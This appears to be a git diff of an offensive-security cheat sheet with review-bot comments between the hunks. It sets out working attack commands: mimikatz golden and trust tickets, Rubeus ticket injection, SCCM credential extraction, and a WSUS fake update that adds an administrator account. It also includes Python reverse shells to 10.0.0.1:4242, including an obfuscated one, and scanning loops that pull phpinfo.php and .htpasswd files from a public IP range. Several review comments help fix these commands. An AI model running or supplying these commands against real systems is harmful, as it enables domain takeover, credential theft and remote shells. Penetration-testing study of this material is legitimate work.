mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
```

#### Use the Trust Ticket file to get a TGS for the targeted service
#### Use the Trust Ticket file to get a ST for the targeted service

```powershell
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
```

Inject the TGS file and access the targeted service with the spoofed rights.
Inject the ST file and access the targeted service with the spoofed rights.

```powershell
kirbikator lsa .\ticket.kirbi
@ -3104,7 +3180,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma

### Kerberos Unconstrained Delegation

> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.

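Review bot: this line is a `>` blockquote attributed to the shenaniganslabs post, and the edit changes "TGS" to "ST" inside the quoted wording. Either keep the source's words and explain the terminology once outside the quote, or mark the substitution (for example "[ST]") so the quote stays faithful to what was written; the same applies to the samAccountName spoofing and RBCD quotes edited in this commit.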
@ -3261,7 +3337,7 @@ PS> ls \\dc01.offense.local\c$

Resource-based Constrained Delegation was introduced in Windows Server 2012.

> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

1. Import **Powermad** and **Powerview**

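Review bot: the rewritten quote is now internally inconsistent: it opens with "sends a Service Ticket (ST)" and ends with "obtain a ST", but the middle still says "present to the authentication service the TGS that the user provided". Rename that occurrence as well (or leave the whole quote as its source wrote it), and use "an ST".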
@ -3465,7 +3541,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
```
* Compromise management server, use locate to find primary server
* use Inspect on primary server to view who you can target
* Use `inspect` on primary server to view who you can target
```ps1
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
@ -3504,6 +3580,28 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
MalSCCM.exe group /delete /groupname:TargetGroup
```


### SCCM Network Access Accounts

> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.

* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
```
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
```ps1
.\SharpDPAPI.exe SCCM
```
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
```ps1
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""
```


### WSUS Deployment

> Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network
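Review bot: `ConvertFrom-SddlString ""` is called with an empty string, so as written it decodes nothing; pass it the SDDL the previous line printed, e.g. `ConvertFrom-SddlString -Sddl (Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA).Sddl`. The cmdlet on the first line should be spelled `Get-WmiObject`, and the ACL bullet would be clearer with one sentence on why it matters (who can read the blob without the escalation the quote above assumes), since the check is otherwise left unexplained.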
@ -3514,7 +3612,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th

1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate`
2. After WSUS Server compromise: `SharpWSUS.exe inspect`
3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"`
5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local`
6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group`
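Review bot: replacing `&&` with `^&` in step 3 changes semantics, not only escaping: after cmd.exe strips the caret a single `&` remains, so the second `net localgroup` command runs even when the preceding `net user` command fails, whereas `&&` ran it only on success. If the goal was to escape the operator for the outer command line, `^&^&` keeps the conditional. Separately, step 6 has an unmatched curly quote in `/groupname:”Demo Group` (compare `/groupname:"Demo Group"` in step 4), which will break the argument split.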
@ -3821,7 +3919,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
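Review bot: the `https:/` fix on the sqlshack entry is correct, but the very next entry, `[SMB Share – SCF File Attacks ...](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)`, has no scheme at all and will render as a relative link inside the repository; give it `https://` in the same pass.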
@ -3873,3 +3971,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
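Review bot: the added "The Phantom Credentials of SCCM" entry is dated only "Jun 28" while every other dated entry in this list carries a year; add it so the reference can be placed in time like its neighbours.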
@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
```powershell
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
beacon > socks [port]
beacon > socks [port] [socks4]
beacon > socks [port] [socks5]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]
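Review bot: the new `socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]` variants list the authentication switch without saying which behaviour the shorter `socks [port] [socks5]` form falls back to; a one-line comment on that, and on the fact that an `enableNoAuth` listener serves anything that can reach the teamserver port, would help readers choose the authenticated and logged variant rather than the first line they see.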
@ -6,97 +6,58 @@
* Shodan
* Wayback Machine
* The Harvester
* Github OSINT

* [Active Recon](#active-recon)
* Network discovery
* RPCClient
* Enum4all

* [List all the subdirectories and files](#list-all-the-subdirectories-and-files)
* Gobuster
* Backup File Artifacts Checker
* [Network discovery](#network-discovery)
* [Web discovery](#web-discovery)

* [Web Vulnerabilities](#looking-for-web-vulnerabilities)
* Repository Github
* Burp
* Web Checklist
* Nikto
* Payment functionality

## Passive recon

* Using Shodan (https://www.shodan.io/) to detect similar app
* Using [Shodan](https://www.shodan.io/) to detect similar app

```bash
can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse)
nmap --script shodan-hq.nse --script-args 'apikey=<yourShodanAPIKey>,target=<hackme>'
```

* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints
* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints

```bash
look for JS files, old links
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=<targetDomain.com>&output=text&fl=original&collapse=urlkey&matchType=prefix"
```

* Using The Harvester (https://github.com/laramies/theHarvester)
* Using [The Harvester](https://github.com/laramies/theHarvester)

```python
python theHarvester.py -b all -d domain.com
```

## Active recon

* [Network discovery](Network%20Discovery.md) with masscan, nmap etc.

* rpcclient

* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git)
```bash
$ rpcclient -U '%' [target host]
rpcclient $> querydominfo
Domain: WORKGROUP
Server: METASPLOITABLE
Comment: metasploitable server (Samba 3.0.20-Debian)
Total Users: 35

rpcclient $> enumdomusers
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
```

* enum4linux

```bash
enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/)
Usage: ./enum4linux.pl [options] ip
-U get userlist
-M get machine list*
-S get sharelist
-P get password policy information
-G get group and member list
-d be detailed, applies to -U and -S
-u user specify username to use (default “”)
-p pass specify password to use (default “”
-a Do all simple enumeration (-U -S -G -P -r -o -n -i).
-o Get OS information
-i Get printer information
==============================
| Users on XXX.XXX.XXX.XXX |
==============================
index: 0x1 Account: games Name: games Desc: (null)
index: 0x2 Account: nobody Name: nobody Desc: (null)
index: 0x3 Account: bind Name: (null) Desc: (null)
index: 0x4 Account: proxy Name: proxy Desc: (null)
index: 0x5 Account: syslog Name: (null) Desc: (null)
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 Account: www-data Name: www-data Desc: (null)
index: 0x8 Account: root Name: root Desc: (null)
```
## Active recon

* Zone Transfer
### Network discovery

```powershell
* Subdomains enumeration
* [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com`

* Network discovery
* Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu)
* Discover services, version and banners

* ASN enumeration
* [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent`

* DNS Zone Transfer
```ps1
host -t ns domain.local
domain.local name server master.domain.local.

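Review bot: in the rewritten Passive recon block, `[GitHub]()` has an empty link target, and the theHarvester snippet is fenced as ```python although `python theHarvester.py -b all -d domain.com` is a shell command line (use ```bash like the neighbouring fences). The bare prose lines inside the bash fences ("can be integrated with nmap (...)", "look for JS files, old links") should be `#` comments so the blocks can be pasted as-is. Also confirm that the ```powershell opener shown just before "* Subdomains enumeration" disappears together with the old "* Zone Transfer" item it belonged to; a stray opener there would swallow the new Network discovery list up to the next ```ps1 fence.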
@ -106,105 +67,66 @@
dig axfr domain.local @192.168.1.1
```

## List all the subdirectories and files
### Web discovery

* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
* List all the subdirectories and files with `gobuster` or `ffuf`
```ps1
# gobuster -w wordlist -u URL -t threads
./gobuster -u http://example.com/ -w words.txt -t 10
```

* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac)
```bash
git clone https://github.com/mazen160/bfac

Check a single URL
bfac --url http://example.com/test.php --level 4

Check a list of URLs
bfac --list testing_list.txt
```

* Using DirBuster or GoBuster
* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer
* Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...)

```bash
./gobuster -u http://buffered.io/ -w words.txt -t 10
-u url
-w wordlist
-t threads
* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness)

More subdomain :
./gobuster -m dns -w subdomains.txt -u google.com -i
* Automated vulnerability scanners
* [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com`
* [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner)
* [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com`

gobuster -w wordlist -u URL -r -e
```
* Manual Testing: Explore the website with a proxy:
* [Caido - A lightweight web security auditing toolkit](https://caido.io/)
* [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/)
* [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload)

* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)

```bash
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```

* Using a script to detect all .htpasswd files in a range of IPs

```bash
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```

## Looking for Web vulnerabilities

* Look for private information in GitHub repos with GitRob

```bash
git clone https://github.com/michenriksen/gitrob.git
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
```

* Explore the website with a proxy (ZAP/Burp Suite)
1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories
2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
3. Explore and understand available functionality, noting areas that correspond to vulnerability types

```bash
Burp Proxy configuration on port 8080 (in .bashrc):
alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"'
alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"'

then launch Burp with : java -jar burpsuite_free_v*.jar &
```

* [WAHH Task Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html

* Subscribe to the site and pay for the additional functionality to test

* Launch a Nikto scan in case you missed something

```powershell
nikto -h http://domain.example.com
```

* Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
|
||||
* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392)
|
||||
> if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free
|
||||
|
||||
From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. "
|
||||
e.g :
|
||||
|
||||
Test card numbers and tokens
|
||||
Test card numbers and tokens
|
||||
|
||||
| NUMBER | BRAND | TOKEN |
|
||||
| :------------- | :------------- | :------------- |
|
||||
| 4242424242424242 | Visa | tok_visa |
|
||||
| 4000056655665556 | Visa (debit) | tok_visa_debit |
|
||||
| 5555555555554444 | Mastercard | tok_mastercard |
|
||||
| NUMBER | BRAND | TOKEN |
|
||||
| :------------- | :------------- | :------------- |
|
||||
| 4242424242424242 | Visa | tok_visa |
|
||||
| 4000056655665556 | Visa (debit) | tok_visa_debit |
|
||||
| 5555555555554444 | Mastercard | tok_mastercard |
|
||||
|
||||
International test card numbers and tokens
|
||||
International test card numbers and tokens
|
||||
|
||||
| NUMBER | TOKEN | COUNTRY | BRAND |
|
||||
| :------------- | :------------- | :------------- | :------------- |
|
||||
| 4000000400000008 | tok_at | Austria (AT) | Visa |
|
||||
| 4000000560000004 | tok_be | Belgium (BE) | Visa |
|
||||
| 4000002080000001 | tok_dk | Denmark (DK) | Visa |
|
||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||
| NUMBER | TOKEN | COUNTRY | BRAND |
|
||||
| :------------- | :------------- | :------------- | :------------- |
|
||||
| 4000000400000008 | tok_at | Austria (AT) | Visa |
|
||||
| 4000000560000004 | tok_be | Belgium (BE) | Visa |
|
||||
| 4000002080000001 | tok_dk | Denmark (DK) | Visa |
|
||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||
|
||||
## References
|
||||
|
||||
|
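Review bot: the two scanning loops hardcode a concrete public range (`98.13{6..9}.{0..255}.{0..255}`, i.e. 98.136.0.0/14) as the example target; replace it with a placeholder such as `TARGET_RANGE` or an RFC 5737 documentation range so that readers who copy the snippet do not probe an unrelated network, and note in a comment that `wget` without `-O`/`-q` writes every fetched `phpinfo.php` into the current directory. As the hunk reads, the ```bash fence opened before `./gobuster -u http://buffered.io/ -w words.txt -t 10` is not closed until after `gobuster -w wordlist -u URL -r -e`, so the bullets `* Take screenshots for every websites using sensepost/gowitness`, `* Automated vulnerability scanners` and the nuclei/Burp/nikto items fall inside the code block; if that is the intended layout of the new file, close the fence after `-t threads` and re-open it around the `-m dns` example. Smaller points: "every websites" should be "every website", "More subdomain :" should be "More subdomains:", and the Nikto block is fenced as ```powershell for a plain shell command.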
@ -20,6 +20,7 @@
|
||||
* [RevSocks](#revsocks)
|
||||
* [plink](#plink)
|
||||
* [ngrok](#ngrok)
|
||||
* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools)
|
||||
* [Basic Pivoting Types](#basic-pivoting-types)
|
||||
* [Listen - Listen](#listen---listen)
|
||||
* [Listen - Connect](#listen---connect)
|
||||
@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
||||
# Expose accessible internal service to the internet
|
||||
./cloudflared tunnel --url <protocol>://<host>:<port>
|
||||
```
|
||||
|
||||
|
||||
## Capture a network trace with builtin tools
|
||||
|
||||
* Windows (netsh)
|
||||
```ps1
|
||||
# start a capture use the netsh command.
|
||||
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
|
||||
|
||||
# stop the trace
|
||||
netsh trace stop
|
||||
|
||||
# Event tracing can be also used across a reboots
|
||||
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
|
||||
|
||||
# To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
|
||||
etl2pcapng.exe c:\trace.etl c:\trace.pcapng
|
||||
|
||||
# Use filters
|
||||
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
|
||||
```
|
||||
* Linux (tcpdump)
|
||||
```ps1
|
||||
sudo apt-get install tcpdump
|
||||
tcpdump -w 0001.pcap -i eth0
|
||||
tcpdump -A -i eth0
|
||||
|
||||
# capture every TCP packet
|
||||
tcpdump -i eth0 tcp
|
||||
|
||||
# capture everything on port 22
|
||||
tcpdump -i eth0 port 22
|
||||
```
|
||||
|
||||
|
||||
## Basic Pivoting Types
|
||||
|
||||
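Review bot: the Linux block is fenced as ```ps1 although it is tcpdump driven from a shell (`sudo apt-get install tcpdump`); use ```bash so it is not presented as PowerShell. In the Windows block the comment "Microsoft has written a convert for this task. Download the latest version." should name the converter and where to get it, since the command below it is only `etl2pcapng.exe c:\trace.etl c:\trace.pcapng` (the tool is microsoft/etl2pcapng on GitHub), and "convert" should read "converter"; "across a reboots" should read "across reboots".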
@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
||||
* 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
|
||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
||||
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
||||
* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)
|
@ -159,10 +159,16 @@ IPv6 (No Spaces, Shortened)
|
||||
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
|
||||
```
|
||||
|
||||
Windows only
|
||||
Windows only (Python2)
|
||||
|
||||
```powershell
|
||||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for 
__g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
|
||||
Windows only (Python3)
|
||||
|
||||
```powershell
|
||||
python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
|
||||
```
|
||||
|
||||
### PHP
|
||||
|
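Review bot: the new "Windows only (Python3)" heading should say why the split from the "Windows only (Python2)" block exists: the one-liner passes `daemon=True` to `threading.Thread(...)`, a constructor argument that only exists from Python 3.3 onwards, so it will fail with a TypeError under the `C:\Python27\python.exe` interpreter used by the block above. A short sentence under the heading would save readers that confusion.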
125
Methodology and Resources/Source Code Management.md
Normal file
@ -0,0 +1,125 @@
|
||||
# Source Code Management
|
||||
|
||||
>
|
||||
|
||||
## Summary
|
||||
|
||||
* [Enumeration](#enumeration)
|
||||
* [Exploit Gitlab CI/Github Actions](#exploit-gitlab-cigithub-actions)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Enumeration
|
||||
|
||||
|
||||
Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit)
|
||||
|
||||
* Discover repositories being used in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local
|
||||
SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
|
||||
```
|
||||
* Search for repositories by repository name in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"
|
||||
SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
|
||||
```
|
||||
* Search for code containing a given keyword in a particular SCM system
|
||||
```ps1
|
||||
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"
|
||||
SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
|
||||
```
|
||||
